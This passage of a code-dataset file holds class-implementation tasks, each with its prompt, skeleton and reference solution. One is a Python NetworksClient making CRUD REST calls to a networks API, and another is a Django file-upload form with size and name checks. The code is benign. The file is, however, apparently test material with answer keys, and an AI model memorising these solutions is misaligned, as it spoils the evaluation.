'{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\nrequest = NetworkRequest(name=name, admin_state_up=admin_state_up, shared=shared, tenant_id=tenant_id)\nresp = self.request('PUT', url, response_entity_type=Network, request_entity=request, requestslib_kwargs=requestslib_kwargs)\nreturn resp", "url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\nresp = self.request('GET', url, response_entity_type=Network, requestslib_kwargs=requestslib_kwargs)\nreturn resp", "params = {'id': network_id, 'name': name, 'status': status, 'admin_state_up': admin_state_up, 'shared': shared, 'tenant_id': tenant_id, 'limit': limit, 'marker': marker, 'page_reverse': page_reverse}\nurl = '{base_url}/networks'.format(base_url=self.url)\nresp = self.request('GET', url, params=params, response_entity_type=Networks, requestslib_kwargs=requestslib_kwargs)\nreturn resp", "url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\nresp = self.request('DELETE', url, requestslib_kwargs=requestslib_kwargs)\nreturn resp"], "bodies_text": "<|body_start_0|>\n super(NetworksClient, self).__init__(serialize_format, deserialize_format)\n self.auth_token = auth_token\n self.default_headers['X-Auth-Token'] = auth_token\n ct = '{content_type}/{content_subtype}'.format(content_type='application', content_subtype=self.serialize_format)\n accept = '{content_type}/{content_subtype}'.format(content_type='application', content_subtype=self.deserialize_format)\n self.default_headers['Content-Type'] = ct\n self.default_headers['Accept'] = accept\n if tenant_id:\n self.default_headers['X-Auth-Project-Id'] = tenant_id\n self.url = url\n<|end_body_0|>\n\n<|body_start_1|>\n url = '{base_url}/networks'.format(base_url=self.url)\n request = NetworkRequest(name=name, admin_state_up=admin_state_up, shared=shared, tenant_id=tenant_id)\n resp = self.request('POST', url, response_entity_type=Network, request_entity=request, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_1|>\n\n<|body_start_2|>\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\n request = NetworkRequest(name=name, admin_state_up=admin_state_up, shared=shared, tenant_id=tenant_id)\n resp = self.request('PUT', url, response_entity_type=Network, request_entity=request, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_2|>\n\n<|body_start_3|>\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\n resp = self.request('GET', url, response_entity_type=Network, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_3|>\n\n<|body_start_4|>\n params = {'id': network_id, 'name': name, 'status': status, 'admin_state_up': admin_state_up, 'shared': shared, 'tenant_id': tenant_id, 'limit': limit, 'marker': marker, 'page_reverse': page_reverse}\n url = '{base_url}/networks'.format(base_url=self.url)\n resp = self.request('GET', url, params=params, response_entity_type=Networks, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_4|>\n\n<|body_start_5|>\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\n resp = self.request('DELETE', url, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_5|>\n", "class_docstring": "", "class_name": "NetworksClient", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass NetworksClient:\n\n def __init__(self, url, auth_token, serialize_format=None, deserialize_format=None, tenant_id=None):\n \"\"\"@param url: Base URL for the networks service @type url: string @param auth_token: Auth token to be used for all requests @type auth_token: string @param serialize_format: Format for serializing requests @type serialize_format: string @param deserialize_format: Format for de-serializing responses @type deserialize_format: string @param tenant_id: optional tenant id to be included in the header if given @type tenant_id: string\"\"\"\n <|body_0|>\n\n def create_network(self, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None):\n \"\"\"@summary: Creates a Network @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. (CRUD: CR) @type tenant_id: string @return: network create response @rtype: Requests.response\"\"\"\n <|body_1|>\n\n def update_network(self, network_id, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None):\n \"\"\"@summary: Updates a specified Network @param network_id: The UUID for the network @type network_id: string @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. (CRUD: CR) @type tenant_id: string @return: update network response @rtype: Requests.response\"\"\"\n <|body_2|>\n\n def get_network(self, network_id, requestslib_kwargs=None):\n \"\"\"@summary: Shows information for a specified network @param network_id: The UUID for the network @type network_id: string @return: get network response @rtype: Requests.response\"\"\"\n <|body_3|>\n\n def list_networks(self, network_id=None, name=None, status=None, admin_state_up=None, shared=None, tenant_id=None, limit=None, marker=None, page_reverse=None, requestslib_kwargs=None):\n \"\"\"@summary: Lists networks, filtered by params if given @param network_id: network ID to filter by @type network_id: string @param name: network name to filter by @type name: string @param status: network status to filter by @type status: string @param admin_state_up: Admin state of the network to filter by @type admin_state_up: bool @param shared: If network is shared across tenants status to filter by @type shared: bool @param tenant_id: tenant ID network owner to filter by @type tenant_id: string @param limit: page size @type limit: int @param marker: Id of the last item of the previous page @type marker: string @param page_reverse: direction of the page @type page_reverse: bool @return: li\"\"\"\n <|body_4|>\n\n def delete_network(self, network_id, requestslib_kwargs=None):\n \"\"\"@summary: Deletes a specified network and its associated resources @param network_id: The UUID for the network @type network_id: string @return: delete network response @rtype: Requests.response\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(NetworksClient, self).__init__(serialize_format, deserialize_format)\n self.auth_token = auth_token\n self.default_headers['X-Auth-Token'] = auth_token\n ct = '{content_type}/{content_subtype}'.format(content_type='application', content_subtype=self.serialize_format)\n accept = '{content_type}/{content_subtype}'.format(content_type='application', content_subtype=self.deserialize_format)\n self.default_headers['Content-Type'] = ct\n self.default_headers['Accept'] = accept\n if tenant_id:\n self.default_headers['X-Auth-Project-Id'] = tenant_id\n self.url = url\n<|end_body_0|>\n\n<|body_start_1|>\n url = '{base_url}/networks'.format(base_url=self.url)\n request = NetworkRequest(name=name, admin_state_up=admin_state_up, shared=shared, tenant_id=tenant_id)\n resp = self.request('POST', url, response_entity_type=Network, request_entity=request, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_1|>\n\n<|body_start_2|>\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\n request = NetworkRequest(name=name, admin_state_up=admin_state_up, shared=shared, tenant_id=tenant_id)\n resp = self.request('PUT', url, response_entity_type=Network, request_entity=request, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_2|>\n\n<|body_start_3|>\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\n resp = self.request('GET', url, response_entity_type=Network, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_3|>\n\n<|body_start_4|>\n params = {'id': network_id, 'name': name, 'status': status, 'admin_state_up': admin_state_up, 'shared': shared, 'tenant_id': tenant_id, 'limit': limit, 'marker': marker, 'page_reverse': page_reverse}\n url = '{base_url}/networks'.format(base_url=self.url)\n resp = self.request('GET', url, params=params, response_entity_type=Networks, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_4|>\n\n<|body_start_5|>\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\n resp = self.request('DELETE', url, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000258", "length_bytes": 7935, "license_type": "permissive", "methods": [{"docstring": "@param url: Base URL for the networks service @type url: string @param auth_token: Auth token to be used for all requests @type auth_token: string @param serialize_format: Format for serializing requests @type serialize_format: string @param deserialize_format: Format for de-serializing responses @type deserialize_format: string @param tenant_id: optional tenant id to be included in the header if given @type tenant_id: string", "name": "__init__", "signature": "def __init__(self, url, auth_token, serialize_format=None, deserialize_format=None, tenant_id=None)"}, {"docstring": "@summary: Creates a Network @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. (CRUD: CR) @type tenant_id: string @return: network create response @rtype: Requests.response", "name": "create_network", "signature": "def create_network(self, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None)"}, {"docstring": "@summary: Updates a specified Network @param network_id: The UUID for the network @type network_id: string @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. (CRUD: CR) @type tenant_id: string @return: update network response @rtype: Requests.response", "name": "update_network", "signature": "def update_network(self, network_id, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None)"}, {"docstring": "@summary: Shows information for a specified network @param network_id: The UUID for the network @type network_id: string @return: get network response @rtype: Requests.response", "name": "get_network", "signature": "def get_network(self, network_id, requestslib_kwargs=None)"}, {"docstring": "@summary: Lists networks, filtered by params if given @param network_id: network ID to filter by @type network_id: string @param name: network name to filter by @type name: string @param status: network status to filter by @type status: string @param admin_state_up: Admin state of the network to filter by @type admin_state_up: bool @param shared: If network is shared across tenants status to filter by @type shared: bool @param tenant_id: tenant ID network owner to filter by @type tenant_id: string @param limit: page size @type limit: int @param marker: Id of the last item of the previous page @type marker: string @param page_reverse: direction of the page @type page_reverse: bool @return: li", "name": "list_networks", "signature": "def list_networks(self, network_id=None, name=None, status=None, admin_state_up=None, shared=None, tenant_id=None, limit=None, marker=None, page_reverse=None, requestslib_kwargs=None)"}, {"docstring": "@summary: Deletes a specified network and its associated resources @param network_id: The UUID for the network @type network_id: string @return: delete network response @rtype: Requests.response", "name": "delete_network", "signature": "def delete_network(self, network_id, requestslib_kwargs=None)"}], "n_methods": 6, "prompt": "Implement the Python class `NetworksClient` described below.\n\nClass description:\nImplement the NetworksClient class.\n\nMethod signatures and docstrings:\n- def __init__(self, url, auth_token, serialize_format=None, deserialize_format=None, tenant_id=None): @param url: Base URL for the networks service @type url: string @param auth_token: Auth token to be used for all requests @type auth_token: string @param serialize_format: Format for serializing requests @type serialize_format: string @param deserialize_format: Format for de-serializing responses @type deserialize_format: string @param tenant_id: optional tenant id to be included in the header if given @type tenant_id: string\n- def create_network(self, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None): @summary: Creates a Network @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. (CRUD: CR) @type tenant_id: string @return: network create response @rtype: Requests.response\n- def update_network(self, network_id, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None): @summary: Updates a specified Network @param network_id: The UUID for the network @type network_id: string @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. (CRUD: CR) @type tenant_id: string @return: update network response @rtype: Requests.response\n- def get_network(self, network_id, requestslib_kwargs=None): @summary: Shows information for a specified network @param network_id: The UUID for the network @type network_id: string @return: get network response @rtype: Requests.response\n- def list_networks(self, network_id=None, name=None, status=None, admin_state_up=None, shared=None, tenant_id=None, limit=None, marker=None, page_reverse=None, requestslib_kwargs=None): @summary: Lists networks, filtered by params if given @param network_id: network ID to filter by @type network_id: string @param name: network name to filter by @type name: string @param status: network status to filter by @type status: string @param admin_state_up: Admin state of the network to filter by @type admin_state_up: bool @param shared: If network is shared across tenants status to filter by @type shared: bool @param tenant_id: tenant ID network owner to filter by @type tenant_id: string @param limit: page size @type limit: int @param marker: Id of the last item of the previous page @type marker: string @param page_reverse: direction of the page @type page_reverse: bool @return: li\n- def delete_network(self, network_id, requestslib_kwargs=None): @summary: Deletes a specified network and its associated resources @param network_id: The UUID for the network @type network_id: string @return: delete network response @rtype: Requests.response", "prompted_full_text": "Implement the Python class `NetworksClient` described below.\n\nClass description:\nImplement the NetworksClient class.\n\nMethod signatures and docstrings:\n- def __init__(self, url, auth_token, serialize_format=None, deserialize_format=None, tenant_id=None): @param url: Base URL for the networks service @type url: string @param auth_token: Auth token to be used for all requests @type auth_token: string @param serialize_format: Format for serializing requests @type serialize_format: string @param deserialize_format: Format for de-serializing responses @type deserialize_format: string @param tenant_id: optional tenant id to be included in the header if given @type tenant_id: string\n- def create_network(self, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None): @summary: Creates a Network @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. (CRUD: CR) @type tenant_id: string @return: network create response @rtype: Requests.response\n- def update_network(self, network_id, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None): @summary: Updates a specified Network @param network_id: The UUID for the network @type network_id: string @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. (CRUD: CR) @type tenant_id: string @return: update network response @rtype: Requests.response\n- def get_network(self, network_id, requestslib_kwargs=None): @summary: Shows information for a specified network @param network_id: The UUID for the network @type network_id: string @return: get network response @rtype: Requests.response\n- def list_networks(self, network_id=None, name=None, status=None, admin_state_up=None, shared=None, tenant_id=None, limit=None, marker=None, page_reverse=None, requestslib_kwargs=None): @summary: Lists networks, filtered by params if given @param network_id: network ID to filter by @type network_id: string @param name: network name to filter by @type name: string @param status: network status to filter by @type status: string @param admin_state_up: Admin state of the network to filter by @type admin_state_up: bool @param shared: If network is shared across tenants status to filter by @type shared: bool @param tenant_id: tenant ID network owner to filter by @type tenant_id: string @param limit: page size @type limit: int @param marker: Id of the last item of the previous page @type marker: string @param page_reverse: direction of the page @type page_reverse: bool @return: li\n- def delete_network(self, network_id, requestslib_kwargs=None): @summary: Deletes a specified network and its associated resources @param network_id: The UUID for the network @type network_id: string @return: delete network response @rtype: Requests.response\n\n<|skeleton|>\nclass NetworksClient:\n\n def __init__(self, url, auth_token, serialize_format=None, deserialize_format=None, tenant_id=None):\n \"\"\"@param url: Base URL for the networks service @type url: string @param auth_token: Auth token to be used for all requests @type auth_token: string @param serialize_format: Format for serializing requests @type serialize_format: string @param deserialize_format: Format for de-serializing responses @type deserialize_format: string @param tenant_id: optional tenant id to be included in the header if given @type tenant_id: string\"\"\"\n <|body_0|>\n\n def create_network(self, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None):\n \"\"\"@summary: Creates a Network @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. (CRUD: CR) @type tenant_id: string @return: network create response @rtype: Requests.response\"\"\"\n <|body_1|>\n\n def update_network(self, network_id, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None):\n \"\"\"@summary: Updates a specified Network @param network_id: The UUID for the network @type network_id: string @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. (CRUD: CR) @type tenant_id: string @return: update network response @rtype: Requests.response\"\"\"\n <|body_2|>\n\n def get_network(self, network_id, requestslib_kwargs=None):\n \"\"\"@summary: Shows information for a specified network @param network_id: The UUID for the network @type network_id: string @return: get network response @rtype: Requests.response\"\"\"\n <|body_3|>\n\n def list_networks(self, network_id=None, name=None, status=None, admin_state_up=None, shared=None, tenant_id=None, limit=None, marker=None, page_reverse=None, requestslib_kwargs=None):\n \"\"\"@summary: Lists networks, filtered by params if given @param network_id: network ID to filter by @type network_id: string @param name: network name to filter by @type name: string @param status: network status to filter by @type status: string @param admin_state_up: Admin state of the network to filter by @type admin_state_up: bool @param shared: If network is shared across tenants status to filter by @type shared: bool @param tenant_id: tenant ID network owner to filter by @type tenant_id: string @param limit: page size @type limit: int @param marker: Id of the last item of the previous page @type marker: string @param page_reverse: direction of the page @type page_reverse: bool @return: li\"\"\"\n <|body_4|>\n\n def delete_network(self, network_id, requestslib_kwargs=None):\n \"\"\"@summary: Deletes a specified network and its associated resources @param network_id: The UUID for the network @type network_id: string @return: delete network response @rtype: Requests.response\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(NetworksClient, self).__init__(serialize_format, deserialize_format)\n self.auth_token = auth_token\n self.default_headers['X-Auth-Token'] = auth_token\n ct = '{content_type}/{content_subtype}'.format(content_type='application', content_subtype=self.serialize_format)\n accept = '{content_type}/{content_subtype}'.format(content_type='application', content_subtype=self.deserialize_format)\n self.default_headers['Content-Type'] = ct\n self.default_headers['Accept'] = accept\n if tenant_id:\n self.default_headers['X-Auth-Project-Id'] = tenant_id\n self.url = url\n<|end_body_0|>\n\n<|body_start_1|>\n url = '{base_url}/networks'.format(base_url=self.url)\n request = NetworkRequest(name=name, admin_state_up=admin_state_up, shared=shared, tenant_id=tenant_id)\n resp = self.request('POST', url, response_entity_type=Network, request_entity=request, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_1|>\n\n<|body_start_2|>\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\n request = NetworkRequest(name=name, admin_state_up=admin_state_up, shared=shared, tenant_id=tenant_id)\n resp = self.request('PUT', url, response_entity_type=Network, request_entity=request, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_2|>\n\n<|body_start_3|>\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\n resp = self.request('GET', url, response_entity_type=Network, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_3|>\n\n<|body_start_4|>\n params = {'id': network_id, 'name': name, 'status': status, 'admin_state_up': admin_state_up, 'shared': shared, 'tenant_id': tenant_id, 'limit': limit, 'marker': marker, 'page_reverse': page_reverse}\n url = '{base_url}/networks'.format(base_url=self.url)\n resp = self.request('GET', url, params=params, response_entity_type=Networks, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_4|>\n\n<|body_start_5|>\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\n resp = self.request('DELETE', url, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_5|>\n", "revision_id": "7d49cf6bfd7e1a6e5b739e7de52f2e18e5ccf924", "skeleton": "<|skeleton|>\nclass NetworksClient:\n\n def __init__(self, url, auth_token, serialize_format=None, deserialize_format=None, tenant_id=None):\n \"\"\"@param url: Base URL for the networks service @type url: string @param auth_token: Auth token to be used for all requests @type auth_token: string @param serialize_format: Format for serializing requests @type serialize_format: string @param deserialize_format: Format for de-serializing responses @type deserialize_format: string @param tenant_id: optional tenant id to be included in the header if given @type tenant_id: string\"\"\"\n <|body_0|>\n\n def create_network(self, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None):\n \"\"\"@summary: Creates a Network @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. (CRUD: CR) @type tenant_id: string @return: network create response @rtype: Requests.response\"\"\"\n <|body_1|>\n\n def update_network(self, network_id, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None):\n \"\"\"@summary: Updates a specified Network @param network_id: The UUID for the network @type network_id: string @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. (CRUD: CR) @type tenant_id: string @return: update network response @rtype: Requests.response\"\"\"\n <|body_2|>\n\n def get_network(self, network_id, requestslib_kwargs=None):\n \"\"\"@summary: Shows information for a specified network @param network_id: The UUID for the network @type network_id: string @return: get network response @rtype: Requests.response\"\"\"\n <|body_3|>\n\n def list_networks(self, network_id=None, name=None, status=None, admin_state_up=None, shared=None, tenant_id=None, limit=None, marker=None, page_reverse=None, requestslib_kwargs=None):\n \"\"\"@summary: Lists networks, filtered by params if given @param network_id: network ID to filter by @type network_id: string @param name: network name to filter by @type name: string @param status: network status to filter by @type status: string @param admin_state_up: Admin state of the network to filter by @type admin_state_up: bool @param shared: If network is shared across tenants status to filter by @type shared: bool @param tenant_id: tenant ID network owner to filter by @type tenant_id: string @param limit: page size @type limit: int @param marker: Id of the last item of the previous page @type marker: string @param page_reverse: direction of the page @type page_reverse: bool @return: li\"\"\"\n <|body_4|>\n\n def delete_network(self, network_id, requestslib_kwargs=None):\n \"\"\"@summary: Deletes a specified network and its associated resources @param network_id: The UUID for the network @type network_id: string @return: delete network response @rtype: Requests.response\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class NetworksClient:\n def __init__(self, url, auth_token, serialize_format=None, deserialize_format=None, tenant_id=None):\n \"\"\"@param url: Base URL for the networks service @type url: string @param auth_token: Auth token to be used for all requests @type auth_token: string @param serialize_format: Format for serializing requests @type serialize_format: string @param deserialize_format: Format for de-serializing responses @type deserialize_format: string @param tenant_id: optional tenant id to be included in the header if given @type tenant_id: string\"\"\"\n super(NetworksClient, self).__init__(serialize_format, deserialize_format)\n self.auth_token = auth_token\n self.default_headers['X-Auth-Token'] = auth_token\n ct = '{content_type}/{content_subtype}'.format(content_type='application', content_subtype=self.serialize_format)\n accept = '{content_type}/{content_subtype}'.format(content_type='application', content_subtype=self.deserialize_format)\n self.default_headers['Content-Type'] = ct\n self.default_headers['Accept'] = accept\n if tenant_id:\n self.default_headers['X-Auth-Project-Id'] = tenant_id\n self.url = url\n\n def create_network(self, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None):\n \"\"\"@summary: Creates a Network @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. (CRUD: CR) @type tenant_id: string @return: network create response @rtype: Requests.response\"\"\"\n url = '{base_url}/networks'.format(base_url=self.url)\n request = NetworkRequest(name=name, admin_state_up=admin_state_up, shared=shared, tenant_id=tenant_id)\n resp = self.request('POST', url, response_entity_type=Network, request_entity=request, requestslib_kwargs=requestslib_kwargs)\n return resp\n\n def update_network(self, network_id, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None):\n \"\"\"@summary: Updates a specified Network @param network_id: The UUID for the network @type network_id: string @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. (CRUD: CR) @type tenant_id: string @return: update network response @rtype: Requests.response\"\"\"\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\n request = NetworkRequest(name=name, admin_state_up=admin_state_up, shared=shared, tenant_id=tenant_id)\n resp = self.request('PUT', url, response_entity_type=Network, request_entity=request, requestslib_kwargs=requestslib_kwargs)\n return resp\n\n def get_network(self, network_id, requestslib_kwargs=None):\n \"\"\"@summary: Shows information for a specified network @param network_id: The UUID for the network @type network_id: string @return: get network response @rtype: Requests.response\"\"\"\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\n resp = self.request('GET', url, response_entity_type=Network, requestslib_kwargs=requestslib_kwargs)\n return resp\n\n def list_networks(self, network_id=None, name=None, status=None, admin_state_up=None, shared=None, tenant_id=None, limit=None, marker=None, page_reverse=None, requestslib_kwargs=None):\n \"\"\"@summary: Lists networks, filtered by params if given @param network_id: network ID to filter by @type network_id: string @param name: network name to filter by @type name: string @param status: network status to filter by @type status: string @param admin_state_up: Admin state of the network to filter by @type admin_state_up: bool @param shared: If network is shared across tenants status to filter by @type shared: bool @param tenant_id: tenant ID network owner to filter by @type tenant_id: string @param limit: page size @type limit: int @param marker: Id of the last item of the previous page @type marker: string @param page_reverse: direction of the page @type page_reverse: bool @return: li\"\"\"\n params = {'id': network_id, 'name': name, 'status': status, 'admin_state_up': admin_state_up, 'shared': shared, 'tenant_id': tenant_id, 'limit': limit, 'marker': marker, 'page_reverse': page_reverse}\n url = '{base_url}/networks'.format(base_url=self.url)\n resp = self.request('GET', url, params=params, response_entity_type=Networks, requestslib_kwargs=requestslib_kwargs)\n return resp\n\n def delete_network(self, network_id, requestslib_kwargs=None):\n \"\"\"@summary: Deletes a specified network and its associated resources @param network_id: The UUID for the network @type network_id: string @return: delete network response @rtype: Requests.response\"\"\"\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\n resp = self.request('DELETE', url, requestslib_kwargs=requestslib_kwargs)\n return resp\n", "source": "the_stack_v2_python_sparse", "source_path": "cloudcafe/networking/networks/networks_api/client.py", "source_repo": "kurhula/cloudcafe", "split": "test", "star_events_count": 0} {"blob_id": "14b0ec57320083bc44b3a228ac206941b7b9e587", "bodies": ["files = self.files.getlist('file_field')\nfor file in files:\n validators.validate_filename(file.name)\n if not file:\n raise forms.ValidationError('Could not read file: %(file_name)s', params={'file_name': file.name})\nfor file in files:\n if file.size > ActiveProject.INDIVIDUAL_FILE_SIZE_LIMIT:\n raise forms.ValidationError('File %(file_name)s is larger than the individual size limit: %(individual_size_limit)s', code='exceed_individual_limit', params={'file_name': file.name, 'individual_size_limit': utility.readable_size(ActiveProject.INDIVIDUAL_FILE_SIZE_LIMIT)})\nif sum((f.size for f in files)) > self.project.core_project.storage_allowance - self.project.storage_used():\n raise forms.ValidationError('Total upload volume exceeds remaining quota', code='exceed_remaining_quota')\nreturn files", "errors = ErrorList()\nfor file in self.files.getlist('file_field'):\n try:\n utility.write_uploaded_file(file=file, overwrite=False, write_file_path=os.path.join(self.file_dir, file.name))\n except FileExistsError:\n errors.append(format_html('Item named {} already exists', file.name))\n except OSError:\n errors.append(format_html('Unable to upload {}', file.name))\nreturn ('Your files have been uploaded', errors)"], "bodies_text": "<|body_start_0|>\n files = self.files.getlist('file_field')\n for file in files:\n validators.validate_filename(file.name)\n if not file:\n raise forms.ValidationError('Could not read file: %(file_name)s', params={'file_name': file.name})\n for file in files:\n if file.size > ActiveProject.INDIVIDUAL_FILE_SIZE_LIMIT:\n raise forms.ValidationError('File %(file_name)s is larger than the individual size limit: %(individual_size_limit)s', code='exceed_individual_limit', params={'file_name': file.name, 'individual_size_limit': utility.readable_size(ActiveProject.INDIVIDUAL_FILE_SIZE_LIMIT)})\n if sum((f.size for f in files)) > self.project.core_project.storage_allowance - self.project.storage_used():\n raise forms.ValidationError('Total upload volume exceeds remaining quota', code='exceed_remaining_quota')\n return files\n<|end_body_0|>\n\n<|body_start_1|>\n errors = ErrorList()\n for file in self.files.getlist('file_field'):\n try:\n utility.write_uploaded_file(file=file, overwrite=False, write_file_path=os.path.join(self.file_dir, file.name))\n except FileExistsError:\n errors.append(format_html('Item named {} already exists', file.name))\n except OSError:\n errors.append(format_html('Unable to upload {}', file.name))\n return ('Your files have been uploaded', errors)\n<|end_body_1|>\n", "class_docstring": "Form for uploading multiple files to a project. `subdir` is the project subdirectory relative to the file root.", "class_name": "UploadFilesForm", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UploadFilesForm:\n \"\"\"Form for uploading multiple files to a project. `subdir` is the project subdirectory relative to the file root.\"\"\"\n\n def clean_file_field(self):\n \"\"\"Check for file name, size limits and whether they are readable\"\"\"\n <|body_0|>\n\n def perform_action(self):\n \"\"\"Upload the files\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n files = self.files.getlist('file_field')\n for file in files:\n validators.validate_filename(file.name)\n if not file:\n raise forms.ValidationError('Could not read file: %(file_name)s', params={'file_name': file.name})\n for file in files:\n if file.size > ActiveProject.INDIVIDUAL_FILE_SIZE_LIMIT:\n raise forms.ValidationError('File %(file_name)s is 